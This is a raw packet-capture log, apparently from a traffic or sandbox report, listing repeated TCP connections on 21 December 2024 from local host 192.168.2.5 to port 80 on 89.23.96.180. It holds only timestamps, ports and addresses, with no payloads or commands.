                                                              Dec 21, 2024 10:48:01.194268942 CET804982589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:01.299483061 CET4982480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:01.419260025 CET804982489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:01.419310093 CET804982489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:01.424546003 CET4982580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:01.544258118 CET804982589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:01.544333935 CET804982589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:01.544364929 CET804982589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:02.339270115 CET804982489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:02.393193007 CET4982480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.454571009 CET804982589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:02.502532959 CET4982580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.570477009 CET804982489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:02.612008095 CET4982480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.690433979 CET804982589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:02.736917019 CET4982580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.814256907 CET4982480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.814524889 CET4982580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.814904928 CET4983180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.934528112 CET804982489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:02.934609890 CET804983189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:02.934643030 CET4982480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.934720993 CET4983180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.935153961 CET804982589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:02.935215950 CET4982580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:02.971949100 CET4983180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:03.091628075 CET804983189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:03.353205919 CET4983180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:03.472906113 CET804983189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:03.472965956 CET804983189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:03.473090887 CET804983189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:04.315351963 CET804983189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:04.361962080 CET4983180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:04.553910017 CET804983189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:04.611897945 CET4983180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:04.687194109 CET4981180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:04.687541962 CET4983180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:04.687861919 CET4983780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:04.807391882 CET804983789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:04.807554007 CET4983780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:04.807739019 CET4983780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:04.808239937 CET804983189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:04.808307886 CET4983180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:04.927294970 CET804983789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:05.158932924 CET4983780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:05.278664112 CET804983789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:05.278723955 CET804983789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:05.278755903 CET804983789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:06.185286999 CET804983789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:06.236923933 CET4983780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:06.422095060 CET804983789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:06.471277952 CET4983780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:06.545440912 CET4983780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:06.545722008 CET4984080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:06.665348053 CET804984089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:06.665463924 CET4984080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:06.665671110 CET4984080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:06.665894985 CET804983789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:06.665978909 CET4983780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:06.786268950 CET804984089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:07.018275976 CET4984080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:07.138104916 CET804984089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:07.138161898 CET804984089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:07.138191938 CET804984089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:07.581929922 CET4984480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:07.582629919 CET4984080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:07.701661110 CET804984489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:07.701965094 CET4984480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:07.702097893 CET4984480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:07.702204943 CET4984580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:07.704828978 CET804984089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:07.704910994 CET4984080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:07.822762966 CET804984489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:07.823906898 CET804984589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:07.823997021 CET4984580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:07.824152946 CET4984580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:07.943636894 CET804984589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:08.049510956 CET4984480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:08.170526981 CET804984489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:08.170548916 CET804984489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:08.174515963 CET4984580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:08.294172049 CET804984589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:08.294230938 CET804984589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:08.294261932 CET804984589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:09.080910921 CET804984489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:09.127521992 CET4984480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.201870918 CET804984589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:09.252521992 CET4984580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.313863993 CET804984489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:09.361898899 CET4984480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.434000015 CET804984589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:09.480447054 CET4984580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.564647913 CET4984480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.564785957 CET4984580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.565152884 CET4985180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.686136961 CET804985189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:09.686173916 CET804984489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:09.686206102 CET804984589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:09.686223030 CET4985180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.686258078 CET4984480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.686290026 CET4984580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.686455965 CET4985180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:09.807712078 CET804985189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:10.033987999 CET4985180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:10.155261993 CET804985189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:10.155364990 CET804985189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:10.155405045 CET804985189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:11.064203024 CET804985189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:11.111912966 CET4985180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:11.298074007 CET804985189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:11.346292019 CET4985180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:11.422322989 CET4985780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:11.542069912 CET804985789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:11.542222977 CET4985780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:11.542387962 CET4985780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:11.662007093 CET804985789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:11.895791054 CET4985780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:12.015652895 CET804985789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:12.015671015 CET804985789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:12.015743971 CET804985789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:12.920655012 CET804985789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:12.971386909 CET4985780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:13.155210018 CET804985789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:13.205678940 CET4985780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:13.279581070 CET4985780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:13.279697895 CET4986380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:13.399430037 CET804986389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:13.399765968 CET804985789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:13.399879932 CET4985780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:13.400047064 CET4986380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:13.400047064 CET4986380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:13.519910097 CET804986389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:13.752748013 CET4986380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:13.872653961 CET804986389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:13.872687101 CET804986389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:13.872720003 CET804986389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:14.347398996 CET4986380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:14.347450972 CET4986480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:14.467077971 CET804986489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:14.467263937 CET4986480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:14.467379093 CET804986389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:14.467425108 CET4986480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:14.467441082 CET4986380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:14.467575073 CET4986580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:14.587914944 CET804986489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:14.588922977 CET804986589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:14.589097023 CET4986580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:14.589155912 CET4986580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:14.708805084 CET804986589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:14.815130949 CET4986480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:14.934705973 CET804986489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:14.934827089 CET804986489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:14.940237999 CET4986580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:15.060122967 CET804986589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:15.060157061 CET804986589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:15.060184956 CET804986589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:15.845374107 CET804986489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:15.893162966 CET4986480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:15.967513084 CET804986589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:16.018274069 CET4986580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.081958055 CET804986489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:16.127588987 CET4986480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.202322960 CET804986589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:16.252578020 CET4986580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.329094887 CET4986480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.329165936 CET4986580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.329467058 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.449119091 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:16.449196100 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.449383020 CET804986489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:16.449567080 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.449601889 CET4986480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.449881077 CET804986589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:16.449933052 CET4986580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.569078922 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:16.799633026 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:16.920634985 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:16.920669079 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:16.920696020 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:17.829046965 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:17.877564907 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.067035913 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.111934900 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.186311960 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.186558962 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.306061983 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.306185007 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.306188107 CET804987189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.306233883 CET4987180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.306391001 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.425955057 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.658922911 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:18.778702021 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.778763056 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:18.778791904 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:19.684927940 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:19.736963034 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:19.921819925 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:19.971301079 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.044270992 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.044447899 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.164165020 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.164303064 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.164455891 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.164483070 CET804987789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.164547920 CET4987780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.287086010 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.518322945 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:20.638214111 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.638310909 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:20.638339996 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.099261999 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.099596977 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.217730045 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.218970060 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.219065905 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.219162941 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.219574928 CET804988389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.219644070 CET4988380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.337516069 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.337616920 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.337713957 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.338691950 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.457902908 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.565200090 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.684926987 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.684988976 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.690118074 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:21.811640024 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.811682940 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:21.811749935 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.597081900 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.643245935 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:22.714060068 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.768187046 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:22.830002069 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.877599001 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:22.945913076 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:22.986928940 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.058260918 CET4985180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.062617064 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.062628031 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.062917948 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.182435989 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.182547092 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.182605028 CET804988589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.182667017 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.182693958 CET4988580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.183192015 CET804988489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.183255911 CET4988480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.302256107 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.534007072 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:23.655004025 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.655036926 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:23.655066967 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:24.558446884 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:24.611953974 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:24.794193983 CET804989189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:24.846302986 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:24.943180084 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:25.063108921 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:25.063258886 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:25.063445091 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:25.182956934 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:25.409174919 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:25.529131889 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:25.529170036 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:25.529186010 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.442559958 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.486958027 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.678473949 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.721492052 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.796035051 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.796248913 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.915973902 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.916039944 CET804989789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:26.916053057 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.916100979 CET4989780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:26.916299105 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.035851002 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.268264055 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.388041019 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.388075113 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.388117075 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.831557035 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.831638098 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.951553106 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.951649904 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.951780081 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.954444885 CET804990389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:27.954507113 CET4990380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.957211971 CET4989180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:27.957247019 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.071403980 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.076917887 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.077012062 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.077169895 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.196949959 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.299559116 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.419208050 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.419338942 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.424555063 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:28.544240952 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.544271946 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:28.544305086 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.331841946 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.377593994 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.454899073 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.502698898 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.566260099 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.612078905 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.689913034 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.736989975 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.811290026 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.811366081 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.811630964 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.931236029 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.931452990 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.931682110 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.932503939 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.932583094 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.932631969 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.932749987 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:30.051279068 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:30.284105062 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:30.405210972 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:30.405255079 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:30.405284882 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.308461905 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.362210035 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.542237043 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.596684933 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.658349991 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.658608913 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.778182030 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.778290033 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.778379917 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.778456926 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.778604031 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.898184061 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:32.127955914 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:32.247714043 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:32.247750998 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:32.247786045 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.167773008 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.221393108 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.280927896 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.281162977 CET4992380192.168.2.589.23.96.180
